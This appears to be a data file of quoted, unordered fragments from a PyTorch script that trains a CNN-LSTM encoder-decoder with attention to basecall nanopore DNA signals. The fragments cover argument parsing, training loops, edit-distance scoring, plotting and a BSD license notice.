"sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0])",
"None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases = False): x_len = list(dict_weights.keys())",
"= dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and",
"forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel size",
"torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] = 1 # one hot encode input input_decoder =",
"+=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch] = editd_iteration writer.close()",
"else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has",
"= cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] =",
"hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder",
"dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10, read_idx, batch_size, shuffle=False): my_dataset =",
"make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all",
"seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### #### sort by decreasing target length sorted_len_target,",
"dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel =",
"# Load data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\",",
"bidirectional self.port = port self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim,",
"batch sortieren # unsort the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort",
"= 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val =",
"sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999))",
"help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) #",
"default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\")",
"loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser = make_argparser() args",
"= [] for p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred",
"model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2, dict_training_editd2,",
"on the validation set\") # CNN arguments parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True)",
"and \"lstm_encoder\" in name: print(name,param.data.size()) n = param.size(0) # forget gate start, end",
"len(x_len))) for idx, u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for",
"editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda",
"dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1)",
"dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0: \"A\", 1:",
"size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder =",
"plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1, 3, 2)",
"bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 *",
"x input_size #### LSTM if (seq_len_cnn <= 0.).sum().item() > 0: # remove neagtive",
"x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) + self.h2h(h) ingate,",
"[dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel() for p in",
"parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port",
"validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v in",
":, :] # sort labels so that they match with order in batch",
"out dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1,",
"gate start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) #",
"= np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train',",
"True # Load data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3:",
"__eq__(self, other): return self.start <= other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore",
"nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser # Network",
"lr={}\\n\" .format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF))",
"end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end)",
"got to the last element in the batch if i == max_in_batch: break",
"+= loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() /",
"train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue",
"[\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b = pd.DataFrame(input_biases, index=y_len_biases, columns=x_len) print(df_b.head())",
"None heatmap_w = None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0",
"+ 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val",
"LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT",
"set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train],",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float,",
"= dropout # Define the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll =",
"original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0,",
"label10, read_idx, batch_size, shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) #",
"[] for iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients to zero",
"optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input",
"make_validation = args.make_validation teacher = args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop",
"= val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len =",
"{:.6f}...\".format((epoch_acc / float(iteration + 1)) * 100), \"Val Loss: {:.6f}...\".format(epoch_loss_val / float(iteration_val +",
"= get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the",
"{} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {} dict_gradients = {}",
"Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling",
"default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"read_idx) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) #",
"looping if we got to the last element in the batch if i",
"1 #arbitrary number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) #",
"--> (batch_size, out_dim) #decide if we are going to use teacher forcing or",
"loss_val[max_idx_train], editd_train[max_idx_train], editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation",
"''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result = editdistance.eval(encoded_pred, encoded_target) editd",
"key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\")",
"self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers = num_layers self.output_dim",
"len(list(param.data.size())) > 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val,",
"padded h = hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden =",
"MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch",
"pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5)",
"= nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim,",
"labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm,",
"performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\")",
"# ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size",
"pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) #",
"= args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay =",
"CNN.output_channel[n_layers_cnn-1] lstm = LSTMencoder(input_dim=out_channels, hidden_dim = hidden, batch_size=batch, output_dim=hidden, num_layers=num_layers, own_cell_encoder=False, bidirectional =",
"+ infile print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path =",
"c) label = y[not_padded_batches, :, i] # batch-i, features, seq len y =",
"y_len: if \"bias\" in name and \"lstm\" in name and \"linear\" not in",
"size, output dim] top1 = input_decoder.argmax(1) # get argmax of prediction #if teacher",
"= h.view(x.size(0), -1) c = c.view(x.size(0), -1) x = x.view(x.size(0), -1) # Linear",
"== 0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy())) # this locator",
"{0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} #",
"idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]])",
"torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_decoder =",
"\\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead",
"tensor_y, label_len, label10, batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) #",
"i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is not None:",
"\"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0",
"element in the batch if i == max_in_batch: break # when seq length",
"x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad = np.zeros((len(y_len),",
"1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy, (hy,",
"loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val],",
"writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation', np.mean(val_acc), updates) if editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit",
"in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len):",
"b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch, seq, feature), lstm_in_unroll, hidden",
"default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float,",
"forcing, use actual next token as next input #if not, use predicted token",
"= 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0 updates =",
"2. Redistributions in binary form must reproduce the above copyright notice, this list",
"parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping",
"None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4))",
"read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname))",
"= num_layers self.output_dim = output_dim self.own_cell_decoder = own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention",
"INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT",
"decoder must have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and",
"= Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x seq_length",
"seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() #",
"nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True,",
"encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred) encoded_target = ''.join([vocab[int(x.item())] for x in seq_target[0:length]]) result =",
"number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder",
"i < true_y_len # get indices of not padded sequences true_y_len = true_y_len[not_padded_batches]",
"const=True, default=False) # LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float,",
"# when seq length (i) >= true seq length if i >= true_y_len[-1].item()",
"lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input for LSTM",
"THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy as np import",
"= torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2,",
"= end def __eq__(self, other): return self.start <= other <= self.end def make_argparser():",
"regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8)",
"documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY",
"batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu()))",
"updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True):",
"F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate",
"n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate start, end =",
"= running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses)",
"os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\" + infile print(file_out) with",
"# put on position: seq, 0:true_batch_size, features # rest: seq, true_batch_size:max_seq_len, features filled",
"= hidden[1][:, not_padded_batches, :] hidden = (h, c) label = y[not_padded_batches, :, i]",
"NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR",
"size, out dim] return outputs, hidden # Sequence to sequence model # -----------",
"hy = outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class",
"{} dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {}",
"must retain the above copyright notice, this list of conditions and the following",
"signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5]))",
"np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates",
"script_dir + \"/\" + infile print(file_out) with open(file_out, 'rb') as handle: read_data =",
"batch if i == max_in_batch: break # when seq length (i) >= true",
"batch_size, shuffle=True): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10) # create your datset",
"n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True,",
"the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright",
"class Range(object): def __init__(self, start, end): self.start = start self.end = end def",
"have equal number of layers!\" assert lstm_encoder.batch_size == lstm_decoder.batch_size, \"Encoder and decoder must",
"updates) #dict_training_editd2[updates] = running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates]",
"bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads,",
"val_set[3].cuda(port), val_set[4].cuda(port), val_set[5].cuda(port)] print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \",",
"= model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0,",
"datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader)",
"float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] =",
"cell gate start, end = n//2, n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start:",
"= 0 num_chars = 0 for idx, length in enumerate(target_lengths): length = int(length.item())",
"editd += result num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer,",
"= np.linalg.norm(m[start: end], ord=2) # forget gate start, end = n//4, n//2 input_biases[idx_b+1,",
"data dict_classes = {0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\",",
"= time.time() hours, rem = divmod(end-start, 3600) minutes, seconds = divmod(rem, 60) print(\"=\"",
"default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for LSTM",
"forms, with or without modification, are permitted provided that the following conditions are",
"help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int,",
"for idx, u in enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p,",
"time import matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages",
"= self.i2h(x) + self.h2h(h) ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate =",
"list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates\")",
"'{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname))",
"forget_bias_decoder)) f.close() # with 10 reads, kernel size = 11 start = time.time()",
"Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"11 start = time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion,",
"shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the",
"= None heatmap_w = None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing =",
"c) + (ingate * cellgate) hy = outgate * F.tanh(cy) #print(\"hy\", hy.size()) hy",
"10 reads, kernel size = 11 start = time.time() out12 = trainNet( model12,",
"file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1,",
"+= acc_val running_acc_val += acc_val val_acc.append(acc_val) if editD: ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val,",
"Network # ----------- # * CNN-Encoder # * LSTM-Encoder # * LSTM-Decoder #",
"fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p, label in",
"= args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay #0.01 #0.01",
"loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4], input[5] max_idx_train",
"end): self.start = start self.end = end def __eq__(self, other): return self.start <=",
"param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\" in name and \"linear\"",
"val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val]",
"= bidirectional self.port = port self.dropout=dropout # Define the LSTM layer self.lstm =",
"if i == max_in_batch: break # when seq length (i) >= true seq",
"editD=editD) plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if __name__ ==",
"path to the pickle input file.\") parser.add_argument('-o', '--output', required = True, help=\"Output folder",
"updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] =",
"= fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()),",
"if p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in name",
"* F.tanh(cy) #print(\"hy\", hy.size()) hy = torch.unsqueeze(hy, 0).cuda(self.port) # (batch, 1, feature) cy",
"editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\")",
"parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\",",
"encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10 reads, kernel",
"parser.add_argument('--strides', nargs='+', type=int, default=[1, 1, 1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11,",
"= nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias)",
"= 0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss =",
"data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4]",
"parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight decay\") parser.add_argument(\"--reduce_lr\", type=lambda x:bool(strtobool(x)),",
"first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder,",
"val_editd.append(ed_val) total_ed += ed_val total_num_chars += num_char_ref if editD: cer = float(total_ed) /",
"read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port), train_set[4].cuda(port), train_set[5].cuda(port)] val_set",
"[batch size, out dim] return outputs, hidden # Sequence to sequence model #",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0,",
"seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio, sorted_hiddens, sorted_len_target, labels_sorted, random_value, mode_type, beam_width) # seq_length x",
"Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__()",
"def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None, mode_type=\"train\", beam_width=1): ########################################### #####",
"label in zip(input, [\"input gate\", \"forget gate\", \"cell activation\", \"out gate\"]): i +=",
"matrix_param[p].reshape((matrix_param[p].shape[0], -1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases",
"= (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original # The",
"= nn.Linear(self.hidden_dim * 2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear =",
"# Backward pass loss.backward() #clipping_value = 1 #arbitrary number of your choosing if",
"running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val",
